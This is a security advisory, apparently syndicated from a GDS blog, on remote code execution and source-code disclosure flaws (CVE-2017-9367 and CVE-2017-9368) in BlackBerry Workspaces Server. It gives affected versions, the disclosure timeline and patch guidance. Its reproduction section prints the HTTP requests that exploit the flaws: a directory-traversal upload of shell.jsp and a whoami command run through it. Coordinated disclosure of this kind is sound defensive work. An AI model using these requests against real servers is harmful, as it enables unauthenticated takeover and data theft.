SBN

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 – CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 – BlackBerry acknowledges receiving our report.
  • 5/16/17 – BlackBerry confirms that an investigation has started.
  • 6/6/17 – BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 – BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 – BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 – BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 – BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 – GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later

*** This is a Security Bloggers Network syndicated blog from Blog authored by Eric Rafaloff. Read the original post at: http://blog.gdssecurity.com/labs/2017/10/16/remote-code-execution-in-blackberry-workspaces-server.html